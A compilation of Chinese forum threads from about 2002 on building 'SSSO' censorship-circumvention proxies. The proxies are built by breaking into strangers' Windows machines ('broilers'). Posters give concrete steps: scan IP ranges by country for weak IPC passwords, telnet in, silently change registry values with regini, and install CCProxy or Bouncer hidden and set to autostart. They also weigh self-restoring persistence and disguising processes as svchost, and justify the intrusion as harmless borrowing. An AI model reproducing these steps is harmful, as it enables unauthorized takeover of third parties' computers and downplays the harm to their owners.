下载ssso3.7远程安装工具包，
仔细阅读文章《SSSO服务器安装步骤详解》
http://qingxin.mine.nu/articles/ssso/sssoaz.htm
然后用ipc扫描一下202.214.198.72附近的网段，再按上述文章一步一步做。
你就可以得到你自己做的ssso服务器了。以后你会越做越成熟的。

ssso服务器填域名就可以了，不用每次都查ip了，我们早就试验过了。

在win98下能做ssso跳板吗？需要什么软件？谢谢！
win98、winme均不行，win2000 和winxp可以。需要的软件看ssso自带的说明，很简单。
日本、韩国的速度最快， 可能的话，找找那里的。

IPC连接为何老提示：系统发生 53 错误？
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

怎么把bouncer做成服务呢？做成自动启动的。
ntservice，ssso客户端里有。

建议]最好不要修改ssso的默认端口
socks代理1122，ssso加密代理443（备用2002）
1、如果改动端口，很容易被其他人覆盖，比如大家先要检查一下肉鸡的1122和443是否被占用，如果改了端口，他就会认为没有占用而安装ssso代理。我就是先看看肉鸡是否安装了ssso，安装的话我就另找肉鸡。
2、同意。我说的自己修改端口是指适合的机子，指那些适合把空密码改掉
以增强安全性，并且已经改了的机子，这时这台机子别人已经扫不到了。
如果连空密码都没有改或不方便改的话，改端口就很没有必要了。
3、对。为什么我不把修改端口为2002的文件做成快捷方式？为了以后的规范，我是希望大家遇到443被占用的主机时干脆放弃，另外443被占用的，可能服务器对安全要求高，不适合做ssso代理。
有好多功能不是不可以加，是不能加，比如通过程序组合，完全可以做到点击一个按钮就做到搜索肉鸡、安装ssso的全自动完成。但这样会对网络安全造成威胁。还是大家在现有水平上能做就做，不能做就不做为好。

问：在安装ssso远程服务器时顺便给服务器打了禁止空连接的补丁似乎没起作用啊!做了SSSO后仍然可以扫描到,也仍然可以连接.
答：服务器要重启后才会生效，当然也有即时生效的方法，但有些服务可能是机主特意开的，我们不能随便给关闭，就包括禁止空连接，有不少服务也是要用到它的。

请教：关于ssso3.6的证书问题。[求助]请问创建证书后，是如何对证书进行验证的？
ssso3.6的客户端和服务端安装工具是分开的，而证书的创建是在服务端安装工具目录下完成的,和客户端不在一个目录下，那么证书是如何验证的呢？
回复:证书是给服务器加密用的，如果你不制作服务器就不用制作证书。服务器谁都可以用，就像SSL网站谁都可以浏览一样。

Target URL not entered.Site Title not entered.什么意思？
答：直译的意思好像是：
目标域名URL没有填写,网站名称没有填写.
还得看在什么情况下出现这个提示，意思可能会不同。

我用ssso-friend 1.5做了一个结果是加密跳板验证成功，socket 5跳板没有成功
★运行指令:验证Socks5跳板代理
正在与202.**.**.104:1122创建socket连接,成功创建socket连接
正在连接 socks5 服务器,连接 socks5 服务器错误代码:10061，什么地方出了问题?
答: socks代理没有成功，原因太多了。端口冲突、防火墙、被查杀……

问：当ssso服务器被破坏掉，开机重启5分钟就自动恢复，这是一个办法，不过能不能在运行期间。让ssso自已监测，如果被破坏后能在不关机的情况下，两个小时后就自动恢复。
答：最初我就是这样做的，但发现几乎无法卸载ssso，因为检测程序始终在运行，无法停止，我们不能只考虑安装，而不管卸载。如果不打算使用这个ssso的时候我们应该礼貌的和他说再见。


清心论坛--精华专题浏览：一点修补IPC弱口令的经验

>> 关于跳板和SSSO的内容，以后请在这里讨论。。。
清心论坛 → 精华专题 → 浏览：一点修补IPC弱口令的经验

您是本帖的第 120 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： 一点修补IPC弱口令的经验
asd

等级：管理员
文章：63
积分：137
注册：2002-10-23
楼顶
一点修补IPC弱口令的经验
今天在VMware虚拟机上反复做试验，总结出一点规律：
1，当把restrictanonymous的值设为2时，流光就扫不到弱口令；
2，把restrictanonymous的值设为2，同时把C$（系统在c盘）删除，x-scan就扫不到弱口令。
以上两点都不需要重启系统。
因此建议下个版本的ssso安装文件加上regini，把restrictanonymous的值和AutoShareServer的值都改了，同时删除IPC$、C$、D$，这样下次别人就不会扫到这台机器了。
不过重启之后，IPC$又重新打开,最好能永久删除。

我测试的系统是w2k server sp2 英文版。

点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 23:07:16
鲜花(0) 鸡蛋(0)
root 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：26
积分：141
注册：2002-10-31
第2楼
发贴心情
如何远程修改对方的restrictanonymous值呢?是进入注册表编辑后用连接网络注册表吧?
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-15 11:06:43
asd 帅哥哟，离线，有人找我吗？

等级：管理员
文章：63
积分：137
注册：2002-10-23
第3楼
发贴心情
下载一个regini.exe（网上很多），然后新建一个文本文档如ipc.txt，在ipc.txt中写如下内容：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous = REG_DWORD 2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer = REG_DWORD 0

然后telnet上对方主机，把这两个文件弄过去，在运行“regini ipc.txt”，注册表就悄悄的改了，最后把这两个文件删了。

点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-15 13:44:39
沧海一粟 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：73
积分：236
注册：2002-10-23
第4楼
发贴心情
不建议使用2，否则可能会造成一些服务无法启动，如SQL Server
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-17 10:24:11
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：73
积分：373
注册：2002-10-24
第5楼
发贴心情
不会太多修改服务器漏洞的，也许人家是资源共享呢？甚至有很多服务要用到空连接的，我们修补他的空连接已经是冒险了。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-17 10:46:10

本主题贴数5，分页： [1]

锁定 | 解锁 | 删除 | 移动 | 固顶 | 奖励 | 惩罚 | 发布公告

Powered by：DVBBS Ver5.0 Final
Copyright ?2000 - 2002 AspSky.Net , 页面执行时间：152.344毫秒


清心论坛--精华专题浏览：如何搜索某个国家的ip范围做ssso?

>> 关于跳板和SSSO的内容，以后请在这里讨论。。。
清心论坛 → 精华专题 → 浏览：如何搜索某个国家的ip范围做ssso?

您是本帖的第 141 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： 如何搜索某个国家的ip范围做ssso?
小张 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：12
积分：81
注册：2002-11-10
楼顶
发贴心情 如何搜索某个国家的ip范围做ssso?
比如我想找日本或美国或韩国或台湾的肉鸡，我怎么知道这些国家的ip搜索范围？
在google可以搜索吗？如何用google搜索？具体格式如何？可否举个例子？
由或者有这方面的软件？
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 17:09:22
鲜花(0) 鸡蛋(0)
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：154
积分：328
注册：2002-10-27
第2楼
发贴心情
用google搜索，比如搜索.jp,你可以得到日本的网站，.tw为台湾的。然后ping他，找到该ip，然后在该ip段扫描。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 18:27:47
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：154
积分：328
注册：2002-10-27
第3楼
发贴心情
你可以下载教程，在“本地下载：电子书＋软件教程＋必备软件“里有ssso-jap-msn使用教程
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 18:29:41
asd 帅哥哟，离线，有人找我吗？

等级：管理员
文章：63
积分：137
注册：2002-10-23
第4楼
发贴心情
mp3 inurl:jp
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 19:43:05
小张 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：12
积分：81
注册：2002-11-10
第5楼
发贴心情
基本上明白了，多谢。不过韩国的后面是什么？比如中国是.cn,台湾.tw,日本.jp，美国.org,加拿大.ca，其他国家的我就不知道了，有没有这方面的列表？

[此贴子已经被作者于2002-11-13 20:21:46编辑过]
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 20:08:54
阳光 帅哥哟，离线，有人找我吗？

等级：管理员
文章：61
积分：113
注册：2002-10-25
第6楼
发贴心情
韩国的是.kr
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 21:35:16
particle 帅哥哟，离线，有人找我吗？

等级：管理员
文章：56
积分：185
注册：2002-10-30
第7楼
发贴心情
到这个网站下载全球IP数据包. http://lotusflower.newage.net.cn/
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 21:52:42
小张 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：12
积分：81
注册：2002-11-10
第8楼
发贴心情
多事补充ping网站的方法：
在win2000中打开 附件--命令提示符，输入命令
ping www.taijinmedia.co.kr
就可以得到韩国211.239.124.151的ip段进行ipc扫描了。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-14 11:31:10
mingj 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：22
注册：2002-10-23
第9楼
发贴心情
各国（地区）代码一览
http://proxy365.1399.org/txt/geguo.htm
搜索特定语言或国家的网页
http://www.google.com/language_tools?hl=zh-CN
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-14 13:49:47

本主题贴数9，分页： [1]

锁定 | 解锁 | 删除 | 移动 | 固顶 | 奖励 | 惩罚 | 发布公告

Powered by：DVBBS Ver5.0 Final
Copyright ?2000 - 2002 AspSky.Net , 页面执行时间：179.688毫秒


[原创]ssso中s.exe的修改方法
古风：[原创]ssso中s.exe的修改方法
    一、SSL默认端口修改（将默认端口443改为其它任意端口）：将NTService.ini中的第六行的443改为其它值，你在用客户端时也要把运行ghip.bat后stunnel.conf文件中的第四行的端口改成上面的值。
    二、socks5默认端口修改（将默认端口1122改为其它任意端口）：将NTService.ini中的第六行的1122改为其它值xxx；将az.bat中的第二行1122同样改为xxx。
    三、自制证书添加（将自制证书保存在一个地方，不必在每次推出新版本时重新制作证书，而只需添加至s.exe中即可）
    四、服务器端跳板阶联（如果使用者有不只一个跳板，在上传s.exe之前，可以设定下一跳板，增加安全性）：
  在az.bat文件中的第二行下插入一行－－msservice -config myserver add ip port y（ip和port为另外一
个跳板的地址和socks5服务端口号）
  以上内容我都做过，只是惭愧不会做程序，建议白云做一个修改服务器安装程序s.exe的小程序，可以类似SSSO－FRIEND的界面，我想这样大家又可以省些事了。
问：NTService.ini这个文件在哪啊
JZX答:在s.exe里面，用winrar打开s.exe。注意不是点击打开，而是按右健，然后选择用rar打开。你就可以看到了。
沧海一粟："msservice -config myserver add ip port"---我没有加“y”，加“y”反而不行。
小开 :我对自制证书不明白：请信息解答，谢谢。
1，都说做证书更安全，能不能把个中道理说明白些，证书到底是干什么用的？证书到底了什么作用？
2，做证书要求输入自己的个人资料，这岂不是更不安全？
3，要求我输入个人资料时，我一律回答了aa,包括国家、单位、email地址我都回答了aa,是不是因此使s.exe失效？
白云 ：证书就是“密码本”，通过这个ssso服务器的所有数据都要按证书特有的密钥加密，如果大家都使用一个证书，就相当于使用一个密码本了，是不是容易被破译？（当然了，即使它们知道证书实际上也是难以破译的，无法在线破译，把所有内容都保存起来以后用超级计算机破译还不如叫它们去死，要花大代价大功夫，难的不如干脆派网特到所有上网电脑前蹲点），输入个人资料你随便输，填什么都可以，1234abcd，不会失效的，但不能中途停止，如果停止你就再制作。


如何做ssso服务器

清心论坛 → 精华专题 → 浏览：如何做ssso服务器

我是海

等级：新手上路
文章：17
积分：90
注册：2002-11-10
如何做ssso服务器
我一直在使用ssso，不过如何获取ssso的服务器权限我一无所知。请哪位高手指点一二。小女子不甚感激！
linux

等级：新手上路
文章：60
积分：180
注册：2002-10-28

为什么要取ssso的服务器权限？！
有些ssso的服务器不是入侵得来的，是好心人热情提供的，妳要入侵他们机器？
linux

等级：新手上路
文章：60
积分：180
注册：2002-10-28

如果是说：自己“做”ssso的服务器，如何获取服务器的权限--入侵，就要看看去如何入侵的技巧/方法了。
我是海

等级：新手上路
文章：17
积分：90
注册：2002-11-10

就是要去别人的机子上做了，一种是自愿提供的，另一种就是要黑别人了，对嘛
gwjo847

并不是黑别人。ssso 的本意是借服务器的开放网络，打开我们通向畅游网络的大门，尤其在大陆无法浏览的敏感网页。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-11 17:08:57
白云

对别人造成威胁和破坏叫“黑”，做ssso代理仅仅是借用一点带宽用于正义。
我是海

不过ssso的远程安装程序，在kv3000下被识别为木马程序，有可能被杀掉。
我是海

网络应该是自由的，这个观点我同意，不过利用别人的机子的漏洞去做那好像不太好了。最好是哪个公司资助白云一下，搞个多服务器的东东出来！
白云

一个人在屋里被歹徒封死了门窗，然后放火要烧死他，他不得已破壁从邻居家逃生，邻居知道了真相也会高兴的，我们目前的状况就是这样，危险已逼近，好多人却浑然不知……
5000

等级：新手上路
文章：15
积分：102
注册：2002-11-4

白云说的好极了，我们为什么要等死呢？
可是，ssso代理服务器实在是难搞呀，我的98系统是没办法自己做了，还得恳请各位斑竹多多施舍呀！
小开

被封锁得没办法了，不得已，以后对方知道了也能了解我们的。何况我们只是借用那么一点点小功能，做更有意义的事情。值得。


ssso远程安装工具包3.8预告

清心论坛 → 精华专题 → 浏览：ssso远程安装工具包3.8预告

白云

等级：管理员
文章：73
积分：373
注册：2002-10-24
ssso远程安装工具包3.8预告
1、3.8版将用CCproxy替代snake跳板，丢包现象不再有。
2、为了肉鸡的长久，ssso服务器上的socks5代理默认将不能使用，以前一次制作可以产生两个代理（ssso和代理跳板），今后将只能产生一个ssso代理。

小张

等级：新手上路
文章：12
积分：81
注册：2002-11-10

snake在自己的网页推出了新的跳板，声称改进了丢包现象，不知有无帮助

SNAKE的程序小屋
http://snake.gnuchina.org/

点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 20:02:21
白云

等级：管理员
文章：73
积分：373
注册：2002-10-24

代理跳板还是不行，我看过代理跳板的源代码，有好多地方都没有办法完美的解决。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 20:26:48
谷风

既然用了CCPROXY，改个名字吧，也好区别于SSSO，就算以后SSSO不更新新版本了，也最好区别开。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 21:15:47
白云

等级：管理员
文章：73
积分：373
注册：2002-10-24

不改了，因为它提供的还是socks5，由于肉鸡失效的原因，一般过不多久就会全换成新版的了。新版毕竟稳定，多大的文件也没有丢包现象。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-13 21:21:52
QFL861

等级：新手上路
文章：53
积分：153
注册：2002-10-23

白云把我说糊涂了：

“ssso服务器上的socks5代理默认将不能使用”

“不改了，因为它提供的还是socks5”

------------- SSSO 3.8 还是 SOCKS5 代理吗？

热切盼望中......

白云

还是socks5，只是不能使用了。
雷龙

当普通sock5还是可以的吧。跳板也有好处，可以级联。
就要捉住你

等级：新手上路
文章：1

不要socks为好，既然不是代理跳板了，无法级联了，要它也没有用了。普通socks代理不安全也没有必要用，开放的话还容易被搜索出来。
QFL861

等级：新手上路
文章：53
积分：153
注册：2002-10-23

客户端还是用SocksCap吗，这样的话应该还是socks吧？最好有“级联”的功能。
沧海一粟

用ccproxy也好，需要级联功能的可自己用老版本做。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-14 16:28:49
asd

ccproxy里有一个二级代理设置，估计也可以级连，没有试过。


清心论坛--精华专题浏览：远程安装包3.8已经出来……

清心论坛 → 精华专题 → 浏览：远程安装包3.8已经出来……

白云

等级：管理员
文章：73
积分：373
注册：2002-10-24
远程安装包3.8已经出来……
正在测试，但根据大家的反馈，干脆3.8不发布了，直接升级到4.0。
4.0的功能将有：1、彻底给肉鸡打补丁，一旦制作好ssso后，大家谁也别再想登陆破坏或重新制作。2、增加自动保护的功能，一旦ssso服务器的任何一个文件被删除，就会自动重新安装。
sync

等级：新手上路
文章：48
积分：150
注册：2002-10-30

不错，请白大虾多多努力！

另外，希望：
1.把STUNNEL放在后台运行
2.CHANGE PROXY最好也用WINDOWS界面，这样更方便用户替换IP而不至于误改变格式。
3.结果调度中的测试应能显示验证速度参数。

谷风

这样最好了。
我想你是要禁止远程登陆？
白云

等级：管理员
文章：73
积分：373
注册：2002-10-24

现在看来似乎不妥，有些功能或许是机主就是要那么开的，给关闭了反而会暴露，至于防止删除，我目前的每分钟检查一次文件，发现有改动就立即恢复，发现这样也不好，因为要在注册表的启动里面加东西，检查程序也不断运行中，很容易暴露。目前这个新版本像病毒一样终止不了删除不掉，这不是我的初衷，也对肉鸡不利，我还得考虑考虑，可能不会发布这样的版本。
ylsf

等级：新手上路
文章：27
积分：130
注册：2002-10-31

我的看法是把这些东西伪装成内核程序，如svchost.exe把要运行的做成它的几个线程。不知道可否，或者做成看不见的线程运行。
asd

等级：管理员
文章：63
积分：137
注册：2002-10-23

我觉得防止IPC扫描就行了，因为做成ssso的服务器都是小服务器，大多数是单机，删除IPC和一些共享没有关系，有影响的只会是极少的一部分。至于自动恢复功能，从你的描述来看还是不加为好。
qfl861

等级：新手上路
文章：53
积分：153
注册：2002-10-23

防止IPC扫描比较好，删除共享嘛......其实组网的时候，我也要用C$等，主要是方便copy文件；自动恢复，采用一对相互看守的进程如何？


高手来看看

清心论坛 → 精华专题 → 浏览：高手来看看

您是本帖的第 245 个阅读者
穿越迷雾

高手来看看
用SSSO访问本站时用户名和密码会暴露吗？还有IP会暴露吗：）我对 网络不太懂，请大家指教：）谢谢！！！
admin

理论上不会得啦。。。具体情况具体分析。。。
sync

等级：新手上路
文章：48
积分：150
注册：2002-10-30

我再提个问题吧.
假如我现在用此用户名\密码和某个跳板上来在论坛发言,然后退出后再用同一台电脑另外一个用户名\密码和代理上来发言,这个服务器的网管能区分出刚才的2个发言者是同一个电脑吗?可用来对比的数据包括IP、COOKIE和其它服务器获得的电脑信息。

我们知道实情是为了今后上网做到心中有数，更好的防范，保证最大的安全。

希望网管能对此问题做个详细的介绍。

白云

理论上是可以的，现实办起来有难度。
sync

等级：新手上路
文章：48
积分：150
注册：2002-10-30

admin说：理论上不会得啦。。。具体情况具体分析。。。

白云说：理论上是可以的，现实办起来有难度。

呵呵，这真是一团迷雾，怪不得有人要“穿越迷雾啊”！！！

白云

等级：管理员
文章：73
积分：373
注册：2002-10-24

我们两个的观点完全一致啊！只是表达方式不同。
就像“基本可以”和“基本不可以”，字面意思完全相反，其实内涵一样，基本可以就是基本不可以，基本不可以就是基本可以。
asd

等级：管理员
文章：63
积分：137
注册：2002-10-23

这个问题是这样的，如果在ssso服务器上架上sniffer，过滤所有进出的信息，恰巧你在这个时候用这个ssso服务器登陆论坛，那你的密码会暴露。不过话说回来，如果一个网管的机器被做成ssso服务器，那恐怕这个网管还不知道sniffer是什么意思。简言之，ssso服务器的网管都是菜鸟而且是小机器，所以大可不必担心自己的密码。不过稍懂一点网络常识的网管还是能看到你的IP的，不过这也不要紧，比如说你的机器被一个日本黑客给黑了，就是你知道他的IP，你会去找他吗，况且我们也不破坏，只是利用一下他的资源。

至于第二个问题很简单，自己在注册一个帐号试一下就知道了。

我是海

言之有理！
aaa

再有就是不要在和陌生人联系时用你常用的代理，否则如果他是特务，有可能会盯上你的代理来钓鱼…
summer

你说的常用代理是指用ＭＳＮ等聊天工具吗？
穿越迷雾

等级：新手上路
文章：5
积分：119
注册：2002-10-23

还一个问题，用SSSO访问网站，本地的电信服务器是否知道我访问的SSSOI服务器地址，能不能让本地的电信服务器不知道我出过国访问过SSSO服务器：）技术上可行吗：）？
linux

等级：新手上路
文章：60
积分：180
注册：2002-10-28

技术上可以，就是再通过其他加密方式的代理去。
但不必要的。
有时我想，如果有一天不封网了，但可能有监视，是不是大家还是要通过代理/加密代理去？！
穿越迷雾

等级：新手上路
文章：5
积分：119
注册：2002-10-23

以下是引用linux在2002-11-16 18:42:29的发言：
技术上可以，就是再通过其他加密方式的代理去。
但不必要的。
有时我想，如果有一天不封网了，但可能有监视，是不是大家还是要通过代理/加密代理去？！

这不一定的。各地方不同，比如在一些地方“一些人”就专盯我们的几个人不让“它们”知道我们出过国就很重要，可以避免很多麻烦的：）！！
我是海

等级：新手上路
文章：17
积分：90
注册：2002-11-10

总有一天网络会开放的，从技术角度来讲网络封锁是不现实的，也没有这个必要，生物的多样性造就了繁荣的地球，文化的多元性造就了现在昌明的人类社会。如果不让人家看看别人怎么想怎么说怎么生活，那么这个社会必将固步自封，就象晚清时期一样了。


跳板使用技巧

JAP找不到服务器，直接、跳板、SSSO全试过了，是否JAP也不行了,怎么办？
把 information service host那项改成它的ip，加ssso就可以了。早上我也不行的。现在可以了。你可以用dnsq去查它的ip是多少。

Q:我是教育网，所以出国前必须经过国内的代理，如何连用？如何将ssso与普通代理连用？
我倒是有个办法，就是在国内肉鸡上安装ssso,该ssso又映射国外的某ssso，可以，只是太麻烦了。有没有简单一点的办法
回复:法子1、可以在国内机器上安装ssso时将跳板指向海外的跳板,或者干脆用傻瓜跳板，不过这样的话，没有国外解析的功能了。
法子2、干脆用跳板吧,可以连跳.没有解析功能就用IP直接上。

在QQ中任何使用SOCKS5跳板，怎么回事？
如果你把代理直接放在QQ里的话，10个里有8个不能用也不算奇怪。
不过，如果把QQ拖进SOCKSCAP里再用，基本上都可以用的。

请教跳板和Stealther如何用?
可能是stealth和跳板不兼容，著名的peek-a-booty和自由网都无法和跳板结合使用。


发现我这里不能用跳板的原由

阿蒙：发现我这里不能用跳板的原由
前几天,攀峰说他那里用不了跳板,我试了几次都没成功,今天换了网吧仍不行,每次都是用SCOCKS控制台内置的那个IE浏览器,跳板是清心提供的应没问题.突然想到攀峰那里和我这一样:都有网警110,为了闪开它平时我都是用MYIE浏览的啊,.于是在SNAKE的控制台里放上了MYIE的图标,一点下去,跳板终于开始狂飙了!
希望对各位有启发

回复： http://www.ttian.net 网吧幽灵V2.0，本软件适合被网吧管理软件下使用，可以杀死你想关闭的程式...具体请看说明。感谢作者19821119提供下载。经测试时发现软件会打开本地一随机端口，经联系作者回复会连www.gwgirl.org.(211字) － qfl861，2002年10月27日
回复： 用柳页肯定能发现那些怪异的东西(30字) － 阿蒙，2002年10月26日
回复： 除了110以外还有很多类似的软件，例如“火眼金睛”什么的(53字) － 乐助，2002年10月26日
回复： 我这里机器上没有啊可是也上不了，不是110的原因(47字) － 攀峰，2002年10月26日
回复： 按热起动键，会显示内存里有NETGUARD这项，有时还不显现就用柳页擦眼肯定现原形，..(76字) － 阿蒙，2002年10月26日
回复： 可是我这里的机器上好象没有装110啊怎么才能知道有没有??为什么myie可以而ie 就不行.(82字) － 攀峰，2002年10月26日
回复： 厉害啊，阿蒙(12字) － 攀峰，2002年10月26日


精悍短小的SOCKS5服务器--Bouncer

* 贴子主题： 精悍短小的SOCKS5服务器--Bouncer
linux

等级：新手上路
文章：60
积分：180
注册：2002-10-28
精悍短小的SOCKS5服务器--Bouncer
SOCKS5服务器只是Bouncer的其中一个功能。Bouncer的大小WINDOWS版只有48K。
经过测试发现很好用，推荐给大家作为SOCKS5服务器。
Bouncer的SOCKS5服务器用法：
Bouncer --port 1080 --socks5

还有其他选项可以：
后台运行、只容许本机使用等，请看说明，自己操作。

Bouncer 是open source项目，但我没有看到源程序：（。

http://www.r00t3d.org.uk

QFL861

等级：新手上路
文章：53
积分：152
注册：2002-10-23

应该很不错啊，其中SSL隧道与Proxy认证功能很有特色。如何设置使用，linux有没有心得呢？

另外，Bouncer的大小WINDOWS版好像是只有99,328字节，在ZIP包中是48K。这倒有个思路，使用EXE压缩工具处理一下，每个人都可以有自己的版本啦。

白云

等级：
文章：71
积分：371
注册：2002-10-24
》》不错，可以限制只本机连接。但没有办法把它做成服务，原来的方法对它的参数不认了，还得慢慢找。

哦，太马虎了，没有仔细验证，可以的，完全可以，就用他啦！]

sunday

能否详细说明Bouncer怎样使用，我现在一头雾水。
asd

等级：
文章：63
积分：137
注册：2002-10-23

做了几个，大家测试一下，看看怎么样。
61.56.130.18:4043
61.56.132.114:4043
61.56.129.54:4043
61.56.131.26:4043
61.56.132.72:4043

用猎手验证socks5时，显示“要密码”，但实际是free的。

guest

等级：新手上路
文章：12
积分：65
注册：2002-11-17

》请教：在dos下输入命令Bouncer --port 1080 --socks5后，ZA有反映，我让它通过防火墙，但接下去具体怎么用它呢？

他是SOCKS5服务器，要和SOCKSCAP（或e-Border--好象和Bouncer 配合不行）一起用。
一般是提供给其他人用的，不是本机。

asd

好像不支持ssl连接，它带的SSL隧道只是http代理。
guest

SOCKS代理不存在象HTTP代理的“支不支持ssl连接”。他不管数据是什么，都传递。
》它带的SSL隧道只是http代理。
“SOCKS5代理服务器”只是Bouncer 其中一个功能，象“它带的SSL隧道”是其他功能。
asd

但我做的这几个不能连接https网站。
guest
和Bouncer无关吧，我曾通过他上这里https://
是不是其他原因？
QFL861

在SOCKSCAP中设置socks服务器：61.56.132.72:4043，再选择sock5，从SOCKSCAP中调用IE5.5，连www.yahoo.com，不通 : ( ，请帮忙说一下，哪儿出的问题呢？
沧海一粟

等级：新手上路
文章：73
积分：235
注册：2002-10-23
转贴: bouncer新版本sock5代理服务器.请你测试
http://www.r00t3d.org.uk/bin/
bouncer-1.0.rc6-win32.zip
新版本sock5代理服务器.请你测试
http://www.r00t3d.org.uk/docs/draft-luotonen-web-proxy-tunneling-01.txt说明
______________________________________
C:\WINNT\system32\aa>bouncer /?
bouncer /?
Bouncer v1.0.RC6 (MileStone)
Build Date: Apr 25 2002 21:18:15
Copyright (c) 2002 Chris Mason
All Rights Reserved

Mandatory Options: (命令选择)
--port Port (Listen Port)
--destination Host:Port (Destination Host) (目的地主机)
--socks5 (Socks 5 Server Mode)

Optional Options:(任意选择)
--bind IP (IP To Bind Listening Socket To)
--c_bind IP (IP To Bind Outgoing Connections To)
--timeout Seconds (Connect, Socks 5 And Tunnelling Time Out)
--tcpnodelay (Disable Nagle''''s Algorithm)
--daemon (Run In The Background As A Daemon)(后台程序)

Logging Options:
--logfile File (File To Output Messages To)
--full-time (Include Date In Timestamps)

SSL Tunnelling Options:
--tunnel Host:Port (HTTP Proxy To SSL Tunnel Through)
--t_user User (User For HTTP Proxy)
--t_password Password (Password For HTTP Proxy)

Access Restriction Options:(存取限制选择) (ip策略 和 用户密码验证)
--allow IP Mask (IP Mask Of Allowed Connections)
--deny IP Mask (IP Mask Of Denied Connections)
--s_user User (User For Socks 5 Server)
--s_password Password (Password For Socks 5 Server)

Administration Options:(管理员选择)
--a_port Port (HTTP Listen Port)
--a_bind IP (IP To Bind Listening Socket To)
--a_user User (User For HTTP Administration Server)
--a_password Password (Password For HTTP Administration Server)

不知道能够串接吗???
测试结论:
1. 不支持中国的oicq程序的udp数据包代理
2. 多个同类型的sock5代理串接的不是很方便.也没有条件测试.
3. 命令行方式参数太长. 好像不是服务方式安装.

有点.1 支持web方式浏览经过改代理服务的所有ip地址.(进入出去)
2 支持密码验证.
3 支持客户端ip限制
4 (HTTP Proxy To SSL Tunnel Through)

参考命令行
1.
C:\WINNT\system32\aa>boun --port 2222 --socks5

2.
C:\WINNT\system32\aa>boun --port 2222 --socks5 --timeout 20 --s_user z --s_password bbbb

3.
C:\WINNT\system32\aa>boun --port 2222 --socks5 --timeout 20 --a_port 3333 --a_user x --a_password cccc
部分记录:
[13:50.36] Waiting For TCP Connections On 0.0.0.0:2222
[13:51.43] [1] Accepted Connection From 218.x.x.243:3235
[13:51.44] [1] Attempting To Connect To 218.x.x.169:5278
[13:51.44] [1] Successfully Connected To 218.x.x.169:5278
[13:52.33] [2] Accepted Connection From 218.x.x.243:3425
[13:52.38] [2] Socks 5 Timed Out Negotiating Methods
[13:52.44] [2] Connection Closed
[13:52.49] [2] Accepted Connection From 218.58.35.243:3436
[13:52.49] [2] Unsupported UDP ASSOCIATE Method Received From Socks 5 Client
[13:52.49] [2] Connection Closed

asd

以下是引用QFL861在2002-11-18 0:19:07的发言：
在SOCKSCAP中设置socks服务器：61.56.132.72:4043，再选择sock5，从SOCKSCAP中调用IE5.5，连www.yahoo.com，不通:(，请帮忙说一下，哪儿出的问题呢？

61.56.132.72:4043是在stunnel.conf中设置的，sockscap中设置的是127.0.0.1:1913。

flyma

注册：2002-10-24
如何限制一个IP段访问呢，如192.168.1.0－192.168.1.255　我老是实验不成，只能限制一个IP。


命令行下安装ccproxy

转帖]命令行下安装ccproxy
论坛刚开不久时，有网友问命令行下安装ccproxy的方法，昨天才在灰色轨迹找到：
首先，要下载CCProxy5.2破解版 http://www.sandflee.net/down/show.asp?id=155。
这是一款国人编的代理服务程序，支持HTTP、SCOK、FTP、Telnet等多种代理，如果你觉得不错，而且有比较好的经济条件，请购买正版。

按照说明安装CCproxy，并把破解文件拷贝到安装目录覆盖原文件。运行CCProxy，点设置，更改各个代理的端口，自动启动和自动隐藏一定要选上。如果你对代理比较了解，可以在高级中设定二级代理、DNS服务器等等。点确定退出。

这时你可以在账号里设定用户名和密码。不设置也没关系。只要你的端口不是8080，别人也不会知道有这个代理的。

现在点退出。你会发现在CCProxy的安装目录下多了一个CCProxy.ini文件。这个文件保存了你刚刚所做的设置。用记事本打开它，添加如下两行：
ALLHIDE=1
AUTOSETUP=1
第一行是使系统左下角的系统栏里不会出现CCProxy的图标。第二行则使CCProxy在第一次运行时会自动安装，是在命令行下安装CCProxy的关键。

现在将CCProxy.exe、CCProxy.ini、CDial.dll、uuid.dll拷贝到肉鸡上的CCProxy目录里（也可以是别的目录，总之这几个文件必须在同一目录中）。你可以把language中的文件也考过去，不过既然是在命令行下安装，也不用看界面，当然用不着管是什么语言的。

现在telnet上肉鸡，运行CCProxy.EXE，快打开IE，试试这个代理吧！